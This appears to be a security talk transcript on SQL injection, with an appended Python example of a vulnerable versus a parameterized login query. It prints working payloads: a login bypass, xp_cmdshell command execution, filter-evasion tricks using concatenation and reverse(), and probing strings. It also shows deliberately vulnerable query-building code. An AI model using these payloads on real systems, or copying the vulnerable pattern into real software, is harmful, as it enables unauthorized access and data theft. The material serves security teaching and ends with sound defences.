How Did I Steal Your Database


Presentation Transcript



How Did I Steal Your Database

Mostafa Siraj

@mostafasiraj



Agenda

Noooo, it kills suspense



DISCLAIMER

  • Hacking websites is ILLEGAL

  • This presentation is meant for educational purposes ONLY

  • Only use this stuff on YOUR website and YOUR account



SQL Injection

What is it?

The application dynamically generates an SQL query based on user input, but it does not sufficiently prevent that input from modifying the intended structure of the query.



SQL Injection Example, Bypassing Logon

  • Original SQL query (Java; deliberately vulnerable, since user input is concatenated straight into the SQL text):

      String sqlQuery = "SELECT * FROM user WHERE name = '" + username + "' AND pass='" + password + "'";
      …

  • Setting username to Mostafa and password to ' OR '1'= '1 produces

      SELECT * FROM user WHERE name = 'Mostafa' AND pass='' OR '1'='1'

  • The attacker is logged on without authentication



Not only your web app and DB are at risk

  • Depending on the DB, an attacker can access the operating system

  • MS SQL Server: Execute OS command xp_cmdshell

  • Setting username to '; exec master.dbo.xp_cmdshell "dir";-- produces

      SELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell "dir"; --

  • Note: dir lists the contents of a directory



Let's play Hide and Seek

  • Original: SELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell "dir"; --

  • Defender: Disallow double quotes:

    • Attacker: SELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell dir; --

  • Defender: Filter out the string "xp_cmdshell"

    • Attacker: ';declare @a varchar(1000);

      set @a = 'master.dbo.xp_' + 'cmdshell dir';

      exec (@a);--

  • Defender: Filter out "xp", "cmd", "shell", …

    • Attacker: ';declare @a varchar(1000);

      set @a = reverse('rid llehsdmc_px.obd.retsam');

      exec (@a);--



Finding SQL Injection Bugs

  • Submit single quotation mark and observe the result

  • Submit two single quotation and observe the result

  • Identify the database by which string-concatenation syntax it accepts, e.g.:

    • Oracle: '||'FOO

    • MS-SQL: '+'FOO

    • MySQL: ' 'FOO [note the space between the two quotes]



  • For multi-stage processes, complete all the stages before observing the results

  • For search fields try using the wildcard character %



  • For numeric data, if the original value was 2, try submitting 1+1 or 3-1

  • If successful, try using SQL-specific functions, e.g. 67-ASCII('A')

  • If single quotes are filtered, try 51-ASCII(1) [note ASCII(1)=49]



Inject into different statement types

  • You can do the same for all SQL statements (INSERT, UPDATE or DELETE)

  • Watch out when injecting into UPDATE or DELETE: a broken WHERE clause can modify or delete every row



Demo

WebGoat



Demo

HacmeBank



Demo

Using UNION Operator



Demo

MS-SQL Error



Solution

  • Validate the input (accept only known-good values)

  • Process SQL queries using prepared statements, parameterized queries, or stored procedures.

  • Enforce least privilege

  • Avoid detailed error messages

  • Take care when using stored procedures that build dynamic SQL (e.g. with exec)
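As an added example (not from the slides), the vulnerable logon query from the earlier slide side by side with the parameterized version this slide recommends, run against a constructed in-memory SQLite user table via Python's sqlite3; the table, the sample credentials and the known-good username pattern are assumptions.

```python
import re
import sqlite3

# Constructed stand-in for the presentation's "user" table (assumption).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (name TEXT, pass TEXT)")
    conn.execute("INSERT INTO user VALUES ('Mostafa', 's3cret')")
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    # Mirrors the slide's Java string concatenation: the user's input becomes
    # part of the SQL text, so a quote in the password rewrites the WHERE clause.
    sql = ("SELECT * FROM user WHERE name = '" + username
           + "' AND pass='" + password + "'")
    return conn.execute(sql).fetchone() is not None

def login_parameterized(conn, username, password):
    # The fix: placeholders keep the input as data; the query structure is fixed
    # before any user-supplied value is bound to it.
    sql = "SELECT * FROM user WHERE name = ? AND pass = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None

# "Accept only known good": an allowlist pattern for usernames (assumed policy).
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")

def is_valid_username(username):
    return USERNAME_RE.match(username) is not None

if __name__ == "__main__":
    db = make_db()
    bypass = "' OR '1'='1"
    print("vulnerable, injected password:", login_vulnerable(db, "Mostafa", bypass))
    print("parameterized, injected password:", login_parameterized(db, "Mostafa", bypass))
    print("parameterized, real password:", login_parameterized(db, "Mostafa", "s3cret"))
    print("username allowlist rejects payload:", not is_valid_username(bypass))
```

Allowlisting alone is not the fix (the password field above carries the payload, and passwords cannot be restricted this way); parameterization is what closes the hole, with validation as defence in depth.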



Thank You

@mostafasiraj

